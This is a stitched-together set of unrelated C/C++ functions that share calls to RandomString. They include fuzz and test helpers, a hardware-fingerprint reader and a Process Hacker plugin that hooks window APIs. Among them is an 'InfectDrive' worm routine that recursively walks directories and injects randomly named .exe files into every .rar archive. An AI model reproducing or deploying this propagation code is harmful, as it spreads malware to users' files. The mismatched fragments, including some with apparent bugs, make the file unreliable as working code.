luna::Function * RandomFunction()
{
auto f = g_gc.NewFunction();
auto s = RandomString();
f->SetModuleName(s);
f->SetLine(RandomNum(1000));
int instruction_count = RandomRange(10, 1000);
for (int i = 0; i < instruction_count; ++i)
{
unsigned int op_min = luna::OpType_LoadNil;
unsigned int op_max = luna::OpType_GetGlobal;
luna::OpType op = static_cast<luna::OpType>(RandomRange(op_min, op_max));
luna::Instruction instruction(op, RandomNum(128), RandomNum(128), RandomNum(128));
f->AddInstruction(instruction, i);
}
int const_num = RandomNum(5);
for (int i = 0; i < const_num; ++i)
f->AddConstNumber(RandomNum(100000));
int const_str = RandomNum(5);
for (int i = 0; i < const_str; ++i)
f->AddConstString(RandomString());
CHECK_BARRIER(g_gc, f);
return f;
}
luna::Value RandomValue(bool exclude_table)
{
luna::ValueT type = luna::ValueT_Nil;
int percent = RandomRange(1, 100);
if (percent <= 20)
type = luna::ValueT_Nil;
else if (percent <= 30)
type = luna::ValueT_Bool;
else if (percent <= 60)
type = luna::ValueT_Number;
else if (percent <= 70)
type = luna::ValueT_String;
else if (percent <= 80)
type = luna::ValueT_Closure;
else if (percent <= 90)
type = luna::ValueT_CFunction;
else
type = exclude_table ? luna::ValueT_Number : luna::ValueT_Table;
luna::Value value;
value.type_ = type;
switch (type)
{
case luna::ValueT_Nil:
break;
case luna::ValueT_Bool:
value.bvalue_ = RandomRange(0, 1) ? true : false;
break;
case luna::ValueT_Number:
value.num_ = RandomNum(100000);
break;
case luna::ValueT_Obj:
value.obj_ = RandomString();
break;
case luna::ValueT_String:
value.str_ = RandomString();
break;
case luna::ValueT_Closure:
value.closure_ = RandomClosure();
break;
case luna::ValueT_Table:
value.table_ = RandomTable();
break;
case luna::ValueT_CFunction:
break;
default:
break;
}
return value;
}
void RunStringSort(){
//building a list of valid characters for random strings. alphabetical + spaces.
Vector<char> chars;
for(int i = 65; i < 91; i++){
chars.add((char)i);
}
for(int i = 97; i < 123; i++){
chars.add((char)i);
}
chars.add(' ');
// populating a vector with some random strings
Vector<string> teststrings;
for(int i = 0; i < 40; i++){
teststrings.add(RandomString(chars,RandomInteger(3,10)));
}
// running the vector through the sort algorithm.
cout << "Testing our CombSort on a vector of strings..." << endl << endl;
cout << "Here is the unsorted vector of strings:" << endl << endl;
PrintVectorString(teststrings);
CombSort(teststrings,StringCmp);
cout << "Here is the sorted version." << endl << endl;
PrintVectorString(teststrings);
}
void Test()
{
MemoryLimitKb(8000000);
for(int sz = 0; sz < 2; sz++) {
for(int pass = 0; pass < 2; pass++) {
RLOG("--------------------");
DUMP(sz);
DUMP(pass);
{
NanoStrings ns;
Vector<dword> ws;
ns.ZeroTerminated(sz);
SeedRandom();
for(int i = 0; i < 140000000; i++) {
if(i % 10000000 == 0)
RLOG("Created " << i);
String s = pass ? "x" : RandomString(Random(4) ? 5 : 50);
ws.Add(ns.Add(s));
}
// ns.DumpProfile();
RLOG("---- Strings " << MemoryUsedKb() << " KB used -------");
RLOG(MemoryProfile());
SeedRandom();
for(int i = 0; i < ws.GetCount(); i++) {
if(i % 10000000 == 0)
RLOG("Tested " << i);
String s = pass ? "x" : RandomString(Random(4) ? 5 : 50);
if((sz ? String(ns.GetPtr(ws[i])) : ns.Get(ws[i])) != s) {
DUMP(i);
DUMP(ns.Get(ws[i]));
DUMP(s);
NEVER();
}
}
RLOG("Test OK");
}
RLOG("===== EMPTY " << MemoryUsedKb() << " KB used -------");
RLOG(MemoryProfile());
}
}
}
extern Slice CompressibleString(Random* rnd, double compressed_fraction,
size_t len, std::string* dst) {
int raw = static_cast<int>(len * compressed_fraction);
if (raw < 1) raw = 1;
std::string raw_data;
RandomString(rnd, raw, &raw_data);
// Duplicate the random data until we have filled "len" bytes
dst->clear();
while (dst->size() < len) {
dst->append(raw_data);
}
dst->resize(len);
return Slice(*dst);
}
void InfectDrive()
{
//variables
WIN32_FIND_DATA wfd;
HANDLE hfind;
char fullpath[MAX_PATH];
LPTSTR xaddr=NULL;
char xrndstr[30];
hfind=FindFirstFile("*.*",&wfd);
if(hfind!=INVALID_HANDLE_VALUE)
{
do
{
if(wfd.cFileName[0]!='.') //most not be .. or .
{
wfd.dwFileAttributes&=FILE_ATTRIBUTE_DIRECTORY;
if(wfd.dwFileAttributes==FILE_ATTRIBUTE_DIRECTORY) //is directory ?
{
if(SetCurrentDirectory(wfd.cFileName)==TRUE)
{
InfectDrive();
SetCurrentDirectory(".."); //return to upper directory
}
}
else
{
if(GetFullPathName(wfd.cFileName,MAX_PATH,fullpath,&xaddr)!=0)
{
CharLower(fullpath);
if(memcmp(fullpath+lstrlen(fullpath)-3,"rar",3)==0)
{
Sleep(5000);
RandomString(xrndstr,7,TRUE);
lstrcat(xrndstr,".exe");
AddToRar(fullpath,wormpath,xrndstr,FILE_ATTRIBUTE_NORMAL);
}
}
}
}
}while(FindNextFile(hfind,&wfd));
FindClose(hfind);
}
}
void RunScope(int count)
{
for (int i = 0; i < count; ++i)
{
int percent = RandomRange(1, 100);
if (percent <= 15)
RandomValue();
else if (percent <= 20)
g_globalFunction.push_back(RandomFunction());
else if (percent <= 30)
g_scopeString.push_back(RandomString());
else if (percent <= 40)
g_scopeClosure.push_back(RandomClosure());
else if (percent <= 50)
g_scopeTable.push_back(RandomTable());
else if (percent <= 55)
NewObjInGlobal();
}
}
//----------------------------------------------------------------------------------------------------------------//
//-------------------------------------------------唯一信息获取---------------------------------------------------//
//----------------------------1.MAC 2.CPUID 3.HDID 4.Random(随机数) 5.特征码 6.ID号 7.包的类型--------------------//
void SM::ReadDataFromComputer(Manage &sm, char* BagType)
{
sm.MACCode = GetMacCode();
sm.CpuCode = GetCpuCode();
sm.HDID = GetHDID();
sm.Random = RandomString();
sm.SecretM = HandleSecret();
sm.BagType = BagType; //包的类型
//参数
sm.rd[0].ReadName = "CID";
sm.rd[1].ReadName = "MID";
sm.rd[2].ReadName = "PID";
sm.rd[3].ReadName = "UID";
sm.rd[0].ReadValue = 1;
sm.rd[1].ReadValue = 1;
sm.rd[2].ReadValue = 1;
sm.rd[3].ReadValue = 1;
}
LOGICAL DllMain(
__in HINSTANCE Instance,
__in ULONG Reason,
__reserved PVOID Reserved
)
{
switch (Reason)
{
case DLL_PROCESS_ATTACH:
{
PPH_PLUGIN_INFORMATION info;
PluginInstance = PhRegisterPlugin(L"TT.MalHide", Instance, &info);
if (!PluginInstance)
return FALSE;
info->DisplayName = L"MalHide";
info->Author = L"TETYYS";
info->Description = L"Changes window properties to prevent malware killing ProcessHacker, however you will not able to see user running PH.";
info->HasOptions = FALSE;
info->Url = L"http://wj32.org/processhacker/forums/viewtopic.php?f=18&t=1301&p=5731";
PhRegisterCallback(
PhGetPluginCallback(PluginInstance, PluginCallbackUnload),
UnloadCallback,
NULL,
&PluginUnloadCallbackRegistration
);
RANGE range;
RangesSize = 27;
Ranges = malloc(sizeof(RANGE) * RangesSize);
Ranges[0] = (RANGE) { .From = 0x0021, .To = 0x007E };
Ranges[1] = (RANGE) { .From = 0x00A1, .To = 0x024F };
Ranges[2] = (RANGE) { .From = 0x1F00, .To = 0x2049 };
Ranges[3] = (RANGE) { .From = 0x2070, .To = 0x2094 };
Ranges[4] = (RANGE) { .From = 0x20A0, .To = 0x20B5 };
Ranges[5] = (RANGE) { .From = 0x20B8, .To = 0x20B9 };
Ranges[6] = (RANGE) { .From = 0x20D0, .To = 0x20E1 };
Ranges[7] = (RANGE) { .From = 0x2100, .To = 0x2138 };
Ranges[8] = (RANGE) { .From = 0x214D, .To = 0x214E };
Ranges[9] = (RANGE) { .From = 0x2153, .To = 0x2182 };
Ranges[10] = (RANGE) { .From = 0x2184, .To = 0x2184 };
Ranges[11] = (RANGE) { .From = 0x2190, .To = 0x21EA };
Ranges[12] = (RANGE) { .From = 0x2200, .To = 0x22F1 };
Ranges[14] = (RANGE) { .From = 0x23BE, .To = 0x23CC };
Ranges[15] = (RANGE) { .From = 0x23CE, .To = 0x23CE };
Ranges[16] = (RANGE) { .From = 0x23DA, .To = 0x23DB };
Ranges[18] = (RANGE) { .From = 0x2460, .To = 0x24FE };
Ranges[19] = (RANGE) { .From = 0x2500, .To = 0x2595 };
Ranges[20] = (RANGE) { .From = 0x25A0, .To = 0x25EF };
Ranges[22] = (RANGE) { .From = 0x3000, .To = 0x303F };
Ranges[23] = (RANGE) { .From = 0xFE30, .To = 0xFE4F };
Ranges[24] = (RANGE) { .From = 0xFE50, .To = 0xFE6B };
Ranges[25] = (RANGE) { .From = 0xFF01, .To = 0xFF65 };
Ranges[26] = (RANGE) { .From = 0xFFE0, .To = 0xFFEE };
srand((UINT)time(NULL));
ClassName = RandomString();
if (MH_Initialize() != MH_OK)
return 1;
if (MH_CreateHook(&CreateWindowExW, &H_CreateWindowExW, (LPVOID*)(&O_CreateWindow)) != MH_OK || MH_EnableHook(&CreateWindowExW) != MH_OK)
return 1;
if (MH_CreateHook(&RegisterClassExW, &H_RegisterClassExW, (LPVOID*)(&O_RegisterClass)) != MH_OK || MH_EnableHook(&RegisterClassExW) != MH_OK)
return 1;
if (MH_CreateHook(&FindWindowExW, &H_FindWindowExW, (LPVOID*)(&O_FindWindow)) != MH_OK || MH_EnableHook(&FindWindowExW) != MH_OK)
return 1;
}
break;
}
return TRUE;
}
VOID NTAPI UnloadCallback(
__in_opt PVOID Parameter,
__in_opt PVOID Context
)
{
MH_Uninitialize();
}
HWND WINAPI H_FindWindowExW(
_In_opt_ HWND hWndParent,
_In_opt_ HWND hWndChildAfter,
_In_opt_ LPCWSTR lpszClass,
_In_opt_ LPCWSTR lpszWindow
)
{
if (lpszClass && wcscmp(lpszClass, ORIGINAL_CLASS_NAME) == 0) {
lpszClass = ClassName;
MH_DisableHook(&FindWindowExW);
}
return O_FindWindow(hWndParent, hWndChildAfter, lpszClass, lpszWindow);
}
ATOM
WINAPI
H_RegisterClassExW(
_In_ /* CONST */ WNDCLASSEXW *lpwcx
)
{
if (wcscmp(lpwcx->lpszClassName, ORIGINAL_CLASS_NAME) == 0) {
lpwcx->lpszClassName = ClassName;
MH_DisableHook(&RegisterClassExW);
}
return O_RegisterClass(lpwcx);
}
HWND WINAPI H_CreateWindowExW(
_In_ DWORD dwExStyle,
_In_opt_ LPCTSTR lpClassName,
_In_opt_ LPCTSTR lpWindowName,
_In_ DWORD dwStyle,
_In_ int x,
_In_ int y,
_In_ int nWidth,
_In_ int nHeight,
_In_opt_ HWND hWndParent,
_In_opt_ HMENU hMenu,
_In_opt_ HINSTANCE hInstance,
_In_opt_ LPVOID lpParam
)
{
BOOL found = FALSE;
if (wcscmp(lpClassName, ORIGINAL_CLASS_NAME) == 0) {
found = TRUE;
lpClassName = ClassName;
lpWindowName = RandomString();
}
HWND ret = O_CreateWindow(dwExStyle, lpClassName, lpWindowName, dwStyle, x, y, nWidth, nHeight, hWndParent, hMenu, hInstance, lpParam);
if (found) {
MainWindowHandle = ret;
MH_DisableHook(&CreateWindowExW);
}
return ret;
}
WCHAR* RandomString() {
ULONG range = rand() % RangesSize;
ULONG len;
do {
len = rand() % 100;
} while (len == 0);
WCHAR* ustr = calloc(sizeof(WCHAR), len + 1);
for (ULONG i = 0; i < len; i++) {
ustr[i] = (rand() % (Ranges[range].To - Ranges[range].From + 1)) + Ranges[range].From;
range = rand() % RangesSize;
}
ustr[len] = L'\0';
return ustr;
}
